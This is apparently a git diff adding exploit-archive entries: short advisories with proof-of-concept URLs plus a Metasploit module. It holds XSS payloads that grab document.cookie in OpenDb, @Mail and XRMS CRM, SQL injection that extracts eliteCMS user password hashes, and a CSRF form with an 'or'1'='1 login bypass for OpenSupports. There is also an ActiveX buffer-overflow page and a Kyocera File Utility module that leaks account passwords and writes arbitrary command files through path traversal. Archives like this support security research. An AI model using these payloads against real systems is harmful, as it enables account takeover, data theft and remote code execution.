--- /dev/null
+++ b/platforms/php/webapps/32313.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30989/info
+
+Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+OpenDb 1.0.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>
\ No newline at end of file
diff --git a/platforms/php/webapps/32314.txt b/platforms/php/webapps/32314.txt
new file mode 100755
index 000000000..d9f1efebc
--- /dev/null
+++ b/platforms/php/webapps/32314.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30989/info
+ 
+Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+OpenDb 1.0.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>
\ No newline at end of file
diff --git a/platforms/php/webapps/32315.txt b/platforms/php/webapps/32315.txt
new file mode 100755
index 000000000..80eff373e
--- /dev/null
+++ b/platforms/php/webapps/32315.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30989/info
+  
+Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+OpenDb 1.0.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie) 
\ No newline at end of file
diff --git a/platforms/php/webapps/32316.txt b/platforms/php/webapps/32316.txt
new file mode 100755
index 000000000..4aa39e70b
--- /dev/null
+++ b/platforms/php/webapps/32316.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30990/info
+
+eliteCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+eliteCMS 1.0 and 1.01 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?page=-1%20union%20all%20select%201,2,3,4,user_name,h_password%20from%20users/*
+
+http://www.example.com/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/32317.txt b/platforms/php/webapps/32317.txt
new file mode 100755
index 000000000..4b08abed0
--- /dev/null
+++ b/platforms/php/webapps/32317.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/30992/info
+
+@Mail and @Mail WebMail are prone to multiple cross-site scripting vulnerabilities because the applications fail to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect the following versions:
+
+@Mail WebMail 5.05 running on Microsoft Windows
+@Mail 5.42 running on CentOS
+
+Other versions running on different platforms may also be affected.
+
+http://www.example.com/parse.php?file="><img/src/onerror=alert(document.cookie)> http://www.example.com/parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo=' http://www.example.com/showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo=' http://www.example.com/abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195 http://www.example.com/showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie) 
\ No newline at end of file
diff --git a/platforms/php/webapps/32318.txt b/platforms/php/webapps/32318.txt
new file mode 100755
index 000000000..e2a0e5a5d
--- /dev/null
+++ b/platforms/php/webapps/32318.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/32319.txt b/platforms/php/webapps/32319.txt
new file mode 100755
index 000000000..6c42cea15
--- /dev/null
+++ b/platforms/php/webapps/32319.txt
@@ -0,0 +1,59 @@
+[+] Author: TUNISIAN CYBER
+[+] Exploit Title: OpenSupports v2.x AuthBypass/CSRF Vulnerabilities
+[+] Date: 15-03-2014
+[+] Category: WebApp
+[+] Version: 2.x
+[+] Tested on: KaliLinux/Windows 7 Pro
+[+] CWE: CWE-302/CWE-89
+[+] Vendor: http://www.opensupports.com/
+[+] Friendly Sites: na3il.com,th3-creative.com
+[+] Twitter: @TCYB3R
+
+1.OVERVIEW:
+OpenSupports v2.x suffers from a CSRF and authentication bypass Vulnerabilities.
+
+2.Version:
+2.x
+
+3.Background:
+http://www.opensupports.com/wiki/index.php?title=Main_Page
+
+4.Proof Of Concept:
+CSRF:Add Staff Members
+<html>
+<form method="POST" name="form0" action="http://localhost/demo/admin/staffadmin.php?id=agregar">
+<input type="hidden" name="nombre" value="TCYB3Rx20x"/>
+<input type="hidden" name="email" value="g4k@hotmail.esxxx"/>
+<input type='submit' name='Submit4' value="Agregar">
+</form>
+</html>
+
+Authentication Bypass:
+File: staff.php
+[PHP]
+if(isset($_POST['user'])){
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$userreg=mysql_query("select * from staff WHERE user='$user' AND pass='$pass'") or die ("ERROR 1");
+[PHP]
+
+Username:1'or'1'='1
+Password:1'or'1'='1
+
+5.Solution(s):
+no contact from vendor
+
+6.TIME-LINE:
+2014-13-03: Vulnerability was discovered.
+2014-13-03: Contact with vendor.
+2014-14-03: No reply.
+2014-15-03: No reply.
+2014-15-03: Vulnerability Published
+
+
+
+7.Greetings:
+Xmax-tn
+Xtech-set
+N43il
+Sec4ver,E4A Members
diff --git a/platforms/php/webapps/32320.txt b/platforms/php/webapps/32320.txt
new file mode 100755
index 000000000..8c1956397
--- /dev/null
+++ b/platforms/php/webapps/32320.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+ 
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/32321.txt b/platforms/php/webapps/32321.txt
new file mode 100755
index 000000000..75a79a1c4
--- /dev/null
+++ b/platforms/php/webapps/32321.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+  
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/32322.txt b/platforms/php/webapps/32322.txt
new file mode 100755
index 000000000..ed47bc5b6
--- /dev/null
+++ b/platforms/php/webapps/32322.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+   
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+   
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/32323.txt b/platforms/php/webapps/32323.txt
new file mode 100755
index 000000000..63656eb87
--- /dev/null
+++ b/platforms/php/webapps/32323.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+    
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+    
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+   
+http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/32324.txt b/platforms/php/webapps/32324.txt
new file mode 100755
index 000000000..5074f5761
--- /dev/null
+++ b/platforms/php/webapps/32324.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+     
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+     
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+   
+http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/32325.txt b/platforms/php/webapps/32325.txt
new file mode 100755
index 000000000..31c2b221b
--- /dev/null
+++ b/platforms/php/webapps/32325.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+      
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+      
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+    
+http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/32326.txt b/platforms/php/webapps/32326.txt
new file mode 100755
index 000000000..c8284dc1c
--- /dev/null
+++ b/platforms/php/webapps/32326.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+       
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+       
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+     
+http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/32327.txt b/platforms/php/webapps/32327.txt
new file mode 100755
index 000000000..225afc86e
--- /dev/null
+++ b/platforms/php/webapps/32327.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31008/info
+        
+XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+        
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+      
+http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script> 
\ No newline at end of file
diff --git a/platforms/windows/dos/32294.html b/platforms/windows/dos/32294.html
new file mode 100755
index 000000000..50b44df24
--- /dev/null
+++ b/platforms/windows/dos/32294.html
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/30814/info
+
+The Microsoft Windows Media Services ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
+
+'nskey.dll' 4.1.00.3917 is vulnerable; other versions may also be affected. 
+
+<html><body>
+
+<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
+<script language=vbscript>
+
+arg1=String(9752, "A")
+target.CallHTMLHelp arg1
+
+</script>
+</body></html>
\ No newline at end of file
diff --git a/platforms/windows/remote/32301.py b/platforms/windows/remote/32301.py
new file mode 100755
index 000000000..621efd608
--- /dev/null
+++ b/platforms/windows/remote/32301.py
@@ -0,0 +1,354 @@
+source: http://www.securityfocus.com/bid/30855/info
+
+Kyocera Mita Scanner File Utility is prone to a directory-traversal vulnerability because it fails to adequately sanitize user-supplied input.
+
+Attackers can exploit this issue to create and overwrite arbitrary files on the affected computer.
+
+Kyocera Mita Scanner File Utility 3.3.0.1 is vulnerable; other versions may also be affected. 
+
+module Msf
+
+class Auxiliary::Spoof::Kyocera::FileUtility < Msf::Auxiliary
+	
+	#
+	# This exploit affects TCP servers, so we use the TCP client mixin.
+	#
+	include Exploit::Remote::Tcp
+	
+	def initialize(info = {})
+	super(update_info(info,
+		
+		'Name' => 'Kyocera Mita File Utility File Injection',
+		'Description' => %q{
+			This exploit attacks the Kyocera Mita File Utility 3.3.0.1 that is part of a scan to desktop
+			solution. There are several bugs in this service. First, there is no authentication. This means anyone
+			can upload a file to the target PC. Second, the file can contain anything, including binary data. Finally,
+			the file name can be altered to include directory information, thus redirecting the file from
+			the default upload location to a specified location. Combined, the service will allow a remote attacker
+			to upload any file to any location on the system. If you do
+			not know the correct ID number of the client side account, you can use the included getidno command to
+			scan a system to detect any and all ID numbers. This will also provide you with any associated 
+			passwords required by printer to upload documents.
+		},
+
+		'Author'         => 'Seth Fogie <seth@whitewolfsecurity.com>'
+
+		)
+	)
+	register_options(
+          [
+              	OptString.new('RPORT', [ true,  "Target port - default is 37100", '37100' ]),
+              	OptString.new('RHOST', [ true,  "Target host", '1']),
+		 	OptString.new('CMD', [ true,  "Command", 'calc.exe']),
+			OptInt.new('IDNO', [ true,  "ID number (1-100)", '1']),
+			OptString.new('IDENT', [ true,  "Identification name", 'ANON']),
+			OptString.new('FILENAME', [ true,  "File name (with folder)", 'Kyocera.bat']),
+			OptString.new('FOLDER', [ false,  "Folder (relative to scan folder)", '']),
+
+          ], self.class
+          )
+end
+
+	
+	def auxiliary_commands
+		return { 
+			"getidno" => "Determine a correct idno",
+		 }
+	end
+
+	#this command detects any and all valid accounts on target machine and returns associated passwords.
+	def cmd_getidno()
+				
+		1.upto(100) do |i|
+   		
+			connect
+	
+			print(".")
+			
+			# Build the buffer for transmission
+			buf= "\x00\x06\x34\x00\x00\x02\x00\x00" #control message to PC
+	
+			# Send it off and get response
+			sock.put(buf)
+			sock.get
+	
+			#add ID number
+			idno  = i
+	
+			buf = "\x02\x1c\x34\x02" +			#details about file name for file utility function
+			[idno].pack('n') +				#ID number
+			"\x00\x08" +
+			"\x00\x0d" +
+			"\x41\x41\x41\x41\x00\x4e\x53\x4e\x5f\x53\x4b\x41\x4e\x3a" +
+			"\x41\x41\x41\x41\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00"
+	
+			sock.put(buf)
+			nulls="\x00\x00"
+			passTest="\xFF\xFF"
+			data=sock.get
+			dataStr=data.to_s
+
+			if dataStr[dataStr.length-6,2] == nulls
+				print("\n")
+				print_status("Valid account number found: " + i.to_s)	
+			end
+			if dataStr[dataStr.length-2,2] != passTest
+				print_status("BONUS! Password! (last four or eight characters of string)" )
+				j=0
+				while j<12
+       				printf("%X",data[j])
+     					j+=1
+			       end
+				print("\n")
+			end
+
+			
+	
+			sock.close
+		end
+		print("\n")
+				
+	end
+	
+
+#
+# The exploit sends the specified command into a kyocera.bat file in the specified folder
+#
+def run
+
+	begin
+	connect
+	
+	print_status("Sending command...")
+	
+	# Build the buffer for transmission
+	buf= "\x00\x06\x34\x00\x00\x02\x00\x00" #control message to PC
+	
+	# Send it off and get response
+	sock.put(buf)
+	sock.get
+	
+	#add ID number
+	idno  = datastore['IDNO']
+	ident = datastore['IDENT']
+	filename = datastore['FILENAME']
+	folder = datastore['FOLDER']
+	locationLength = filename.length + folder.length
+
+	
+	buf = "\x02\x1c\x34\x02" +			#details about file name for file utility function
+	[idno].pack('n') +				#ID number
+	"\x00\x08" +
+	"\x00\x0d" +
+	"\x41\x41\x41\x41" +
+	"\x00\x4e\x53\x4e\x5f\x53\x4b\x41\x4e\x3a" +
+	ident +
+	"\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00"
+
+	
+	
+	sock.put(buf)
+	nulls="\x00\x00"
+	passTest="\xFF\xFF"
+	data=sock.get
+	dataStr=data.to_s
+	
+	#print_status(nulls)
+	#print_status(dataStr[dataStr.length-6,2])
+
+	if dataStr[dataStr.length-6,2] != nulls
+		print_status("Invalid account number - use getidno command to find valid idno")	
+	end
+	if dataStr[dataStr.length-2,2] != passTest
+		print_status("BONUS! Password! (last four or 8 characters of string)" )
+		j=0
+		while j<12
+       		printf("%X",data[j])
+     			j+=1
+		end
+		print("\n")
+	end
+
+	buf = "\x00\x54" +				#details about file name 
+	"\x30" +					#location size (must be x30)
+	"\x01" +					#can be altered to include folder and file
+	"\x00\x05\x00\x00" +
+	"\xff\xff\xff\xff\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x00\x00\x00" +
+	"\x00\x00\x00\x00\x00\x24" +
+	folder + filename
+	
+	padding = 48-locationLength
+	j=0
+	while j<padding
+       	buf += "\x00"
+     		j+=1
+	end
+	
+
+	#"\x4b\x79\x6f\x63\x65\x72\x61\x2e\x62\x61\x74" +
+	#"\x00\x00\x00"
+
+
+	#add command length
+	thecommand  = datastore['CMD']
+	cmdLen = thecommand.length
+	buf += [cmdLen].pack('N')
+	
+	#add command
+	buf << thecommand
+	
+	j=0
+
+	#put file
+	sock.put(buf)				
+
+	buf = "\x00\x04\x30\x02\x00\x00"
+
+
+	
+	sock.put(buf)				
+	
+	buf="\x00\x04\x30\x05\x53\xdc"	
+
+	sock.put(buf)
+	sock.get
+	
+	buf="\x00\x04\x30\x03\x00\x00"
+
+	sock.put(buf)
+	sock.get
+
+	end
+end
+end
+end
\ No newline at end of file